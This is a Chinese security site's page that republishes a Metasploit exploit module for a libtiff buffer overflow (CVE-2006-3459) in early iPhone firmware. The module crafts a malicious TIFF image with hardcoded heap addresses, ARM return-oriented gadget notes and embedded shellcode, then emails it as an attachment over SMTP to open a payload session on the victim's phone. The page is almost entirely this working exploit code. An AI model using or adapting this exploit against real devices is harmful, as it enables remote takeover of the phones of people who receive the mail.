首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple iOS MobileMail LibTIFF Buffer Overflow
来源:http://www.metasploit.com 作者:hdm 发布时间:2012-10-12  

##
# $Id: mobilemail_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 #
 # This module sends email messages via smtp
 #
 include Msf::Exploit::Remote::SMTPDeliver

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
   'Description'    => %q{
     This module exploits a buffer overflow in the version of
    libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
    1.1.1 of the Apple iPhone. iPhones which have not had the BSD
    tools installed will need to use a special payload.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>  ['hdm', 'kf'],
   'Version'        => '$Revision: 15950 $',
   'References'     =>
    [
     ['CVE', '2006-3459'],
     ['OSVDB', '27723'],
     ['BID', '19283']
    ],
   'Stance'         => Msf::Exploit::Stance::Passive,
   'Payload'        =>
    {
     'Space'    => 1800,
     'BadChars' => "",
     'Compat'   =>
      {
       'ConnectionType' => '-bind -find',
      },
    },
   'Arch'           => ARCH_ARMLE,
   'Targets'        =>
    [

     [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
      {
       'Platform' => 'osx',

       # Scratch space for our shellcode and stack
       'Heap'     => 0x00802000,

       # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
       'Magic'    => 0x300d562c,
      }
     ],
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Aug 01 2006'
   ))

 end

 def autofilter
  false
 end

 def exploit

  exts = ['jpg', 'tiff', 'tif']

  gext =  exts[rand(exts.length)]
  name = rand_text_alpha(rand(10)+1) + ".#{gext}"
  data = Rex::Text.rand_text_alpha(rand(32)+1)
  tiff = generate_tiff(target)

  msg = Rex::MIME::Message.new
  msg.mime_defaults
  msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
  msg.to = datastore['MAILTO']
  msg.from = datastore['MAILFROM']

  msg.add_part(Rex::Text.encode_base64(data, "\r\n"), "text/plain", "base64", "inline")
  msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + "." + gext)

  send_message(msg.to_s)

  print_status("Waiting for a payload session (backgrounding)...")
 end

 def generate_tiff(targ)
  #
  # This is a TIFF file, we have a huge range of evasion
  # capabilities, but for now, we don't use them.
  #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
  #

  lolz = 2048
  tiff =
   "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
   "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
   "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
   "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
   "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
   "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
   "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
   "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
   "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
   [lolz].pack("V") +
   "\x84\x00\x00\x00\x00\x00\x00\x00"

  # Randomize the bajeezus out of our data
  hehe = rand_text(lolz)

  # Were going to candy mountain!
  hehe[120, 4] = [targ['Magic']].pack("V")

  # >> add r0, r4, #0x30
  hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")

  # Candy mountain, Charlie!
  # >> mov r1, sp

  # It will be an adventure!
  # >> mov r2, r8
  hehe[ 92, 4] = [ hehe.length ].pack("V")

  # Its a magic leoplurodon!
  # It has spoken!
  # It has shown us the way!
  # >> bl _memcpy

  # Its just over this bridge, Charlie!
  # This magical bridge!
  # >> ldr r3, [r4, #32]
  # >> ldrt r3, [pc], r3, lsr #30
  # >> str r3, [r4, #32]
  # >> ldr r3, [r4, #36]
  # >> ldrt r3, [pc], r3, lsr #30
  # >> str r3, [r4, #36]
  # >> ldr r3, [r4, #40]
  # >> ldrt r3, [pc], r3, lsr #30
  # >> str r3, [r4, #40]
  # >> ldr r3, [r4, #44]
  # >> ldrt r3, [pc], r3, lsr #30
  # >> str r3, [r4, #44]

  # We made it to candy mountain!
  # Go inside Charlie!
  # sub sp, r7, #0x14
  hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")

  # Goodbye Charlie!
  # ;; targ['Heap'] + 0x48 becomes the stack pointer
  # >> ldmia sp!, {r8, r10}

  # Hey, what the...!
  # >> ldmia sp!, {r4, r5, r6, r7, pc}

  # Return back to the copied heap data
  hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")

  # Insert our actual shellcode at heap location + 196
  hehe[196, payload.encoded.length] = payload.encoded

  tiff << hehe
 end

end


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple iOS MobileSafari LibTIFF
·KeyHelp ActiveX LaunchTriPane
·Linux binfmt_script Disclosure
·PHP 5.3.4 com_event_sink 0-Day
·Metasploit < v4.4 pcap_log Plu
·Microsoft Office Excel ReadAV
·Project Pier Arbitrary File Up
·MS12-063 Microsoft Internet Ex
·Huawei Technologies Internet M
·HP Application Lifecycle Manag
·QQPlayer 3.7.892 m2p quartz.dl
·Oracle Business Transaction Ma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved